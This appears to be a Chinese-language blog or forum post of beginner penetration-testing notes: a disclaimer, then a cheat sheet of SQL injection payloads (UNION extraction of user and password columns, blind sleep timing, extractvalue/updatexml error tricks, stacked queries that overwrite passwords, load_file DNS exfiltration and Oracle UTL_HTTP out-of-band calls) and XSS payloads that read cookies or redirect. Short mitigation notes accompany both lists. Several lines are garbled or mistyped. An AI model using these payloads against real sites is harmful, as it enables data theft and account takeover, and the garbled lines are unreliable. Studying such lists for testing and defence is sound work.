本帖内容为初级渗透测试中的注入测试,仅用于验证 Web 系统安全,均为个人平时课程学习所得,属于正常的互联网产品测试内容。虽然是初级内容,未经系统所属主体或组织允许,也不可应用本帖内容;若有人不当使用本帖内容造成损失,与本帖作者无关,作者不承担任何法律责任。同时,作者作为初学者,难免有写错的地方,欢迎在评论区或私信指出,作者会根据意见修改。
SQL注入
以下语句和请求能够生效,前提都是程序把请求参数直接拼接进 SQL 语句;使用参数化查询(预编译语句)可使这些输入失效,限制数据库账号权限、关闭向页面回显数据库错误可进一步降低影响。
select * from < 表名> where id = x and 1 = 1
select * from < 表名> where id = 'x' and '1' = '1
select id,name from test where id=1 or 1=1
select * from table where name=' 2 ''
select * from tables where title like '%
http://127.0.0.1/XXX.php?title=t' and '1' = '1'
http:/ / 127.0 .0 .1 / XXX.php?title= 'union select 1,2,3,4,5,6,7 from INFORMATION_SCHEMA.tables --' & action= search
http:/ / 127.0 .0 .1 / XXX.php?title= 'union select 1, user(), database(), table_name,version(),6,7 from INFORMATION_SCHEMA.tables where table_schema=database() -- ' & action= search
http:/ / 127.0 .0 .1 / XXX.php?title= 'union select 1, column_name,3,4,5,6,7 from INFORMATION_SCHEMA.columns where table_name = ' users' -- ' & action= search
http:/ / 127.0 .0 .1 / XXX.php?title= 'union select 1, login,password,4,5,6,7 from users -- ' & action= search
报文内容参数直接加'
报文内容参数直接加union :
union select 1,2 from INFORMATION_SCHEMA.tables -- &action=go
union select 1,2,3,4,5,6,7 from INFORMATION_SCHEMA.tables -- &action=go
union select user(), user(), database(),table_name,version(),user(),user() from INFORMATION_SCHEMA.tables-- &action=go
http:/ / test.com/ XXX?id= 1 and substring (version(),1 ,1 )= 5
http:/ / test.com/ XXX?id= 1 UNION ALL SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA
select * from user where id= '4' and sleep(3 )
http:/ / 127.0 .0 .1 / XXX.php?id= 1234 ' and length(database())=4 and sleep(3) -- &action=search
http://127.0.0.1/XXX.php?id=1234' and substr(database(),1 ,1 )= ‘a' and sleep(3) -- &action=search
http://127.0.0.1/XXX.php?id=1234' and length(version())= 5 and sleep(3 )
http:/ / 127.0 .0 .1 / XXX.php?id= 1234 ' and ascii(substr(database(),1,1))=98 and sleep(3) -- &action=search,其中 98 是字符 b 的 ASCII 码(十进制)
select floor (0.1 ),floor (0.51 ),floor (0.99 )
select 1 from (select count (* ),concat(user (),floor (rand(0 )* 2 ))x from information_schema.tables group by x)a;
select rand() from information_schema.tables limit 0,10
select count (* ),concat((select user ()),floor (rand(0 )* 2 ))x from test group by x
select extractvalue('<a><b>test</b></a>' ,'~wrong' )
select extractvalue('<a><b>test</b></a>' ,(select @@version ))
select extractvalue('<a><b>test</b></a>', concat(0x7e, (select @@version))) 其中 0x7e 是字符 ~ 的十六进制编码,用来让 XPath 参数不合法从而触发报错
http:/ / 127.0 .0 .1 / XXX.php?id= 1 ' and extractvalue(1, concat(0x7e, (select @@version))) -- '
http:/ / 127.0 .0 .1 / XXX/ ?id= 1 ' and extractvalue(1,concat(0x7e, (select @@version))) -- ' & Submit= Submit#
http:/ / 127.0 .0 .1 / XXX/ ?id= 1 ' and extractvalue(1, concat(0x7e,(select user()),0x7e,(select database()))) -- ' & Submit= Submit#
http:/ / 127.0 .0 .1 / XXX/ ?id= 1 ' and extractvalue(1, concat(0x7e,(select table_name from information_schema.tables where table_schema="xxx" limit 0,1))) -- ' & Submit= Submit#
http:/ / 127.0 .0 .1 / XXX/ ?id= 1 ' and extractvalue(1, concat(0x7e,(select table_name from information_schema.tables where table_schema=' xxx ' limit 1,1))) -- ' & Submit= Submit#
http:/ / 127.0 .0 .1 / XXX/ ?id= 1 ' and extractvalue(1, concat(0x7e,(select column_name from information_schema.columns where table_schema="users" limit 3,1))) –
http://127.0.0.1/XXX/?id=1' and extractvalue(1 , concat(0x7e , (select concat_ws(':' ,user ,password) from xxx.users limit 0 ,1 )))
select updateXML('<a><b>test</b></a>', '/a/b', 'updateXMLtest')
http:/ / 127.0 .0 .1 / XXX/ ?id= 2 ' and updatexml(1,concat(0x7e,(SELECT @@version)),1) -- '
select exp (~ (select * from (select database())x))
select exp (~ (select * from (select user ())x));
select extractivalue(1 ,mid(concat(0x7e , (select concat_ws(':' ,user ,password) from dvwa.users limit 0 ,1 ) ),1 ,29 ))
http:/ / 127.0 .0 .1 / XXX/ ?id= 1 ;update t set name = 'a' where id= 1
select concat(to_base64(substr(load_file("C: \\MySQL5.7.26\\my.ini"),1 ,15 )),".example.com") as result ;
select UTL_HTTP.request('http:// 127.0.0.1/test123.php' || '?id=' || (select version from v$instance)) from dual
http:/ / 127.0 .0 .1 / xxx/ ?id= 1 '; update users set password=e10adc3949ba59abbe56e057f20f883e' where user_id= 1 ; - - & Submit= Submit#
?id= 1 and 1 = 1
?id= 1 ’ and 1 = 1
?id= 1 % df’ and 1 = 1
1 || 1 = 1 1 && 1 = 1
1 || (select user from users where user_id = 1 )= 'admin'
select * from test where id = 1 || (select count (* ) from test)> 0
1 || (select user from users limit 1 ,1 )= 'admin'
1 || (select min (user ) from group by user_id having user_id)
1 || select substr((select group_concat(name)name from test),1 , 1 ) = 't'
1 || substr(name, 1 , 1 )= unhex(74 )
1 || substr(name, 1 , 1 )= 0x74
1 || binary (name)= 0x74657374
select namefrom testwhere idlike 1
http:/ / 127.0 .0 .1 / XXX/ ?id= 133 % df% 27 union select 1 ,user (),3 % 23
http:/ / 127.0 .0 .1 / XXX.php?id= 12 union select 1 ,2 ,Host,User ,Password,6 ,7 from mysql.user limit 4 ,1 & action= go
http:/ / 127.0 .0 .1 / XXX.php?id= 12 union select 1 ,2 ,@@basedir ,@@@version ,5 ,6 ,7 from mysql.user limit 0 ,1 & action= go
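XSS注入
以下输入只有在页面把用户数据未经转义直接输出到 HTML 时才会执行;按输出上下文做编码、为会话 Cookie 设置 HttpOnly 并启用 Content-Security-Policy 可以阻止或降低其影响。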
<script > alert(1)</script >
<script > alert ("点击此处修复" );location.href ="https://www.baidu.com" </script >
<script > alert (document .cookie )</script >
<img src ="a.png" onerror =alert(1) >
<img src =x onerror =alert( "xss ")>
<script > alert'xss' </script >
<script > alert (/xss/ )</script >
<img src = ;x onerror =alert( "xss ")>
请求报头第一行等号后面参数改为%0a%3dglobal
请求报头第一行等号后面参数改为%0a%3d8*8
请求报头第一行等号后面参数改为8*8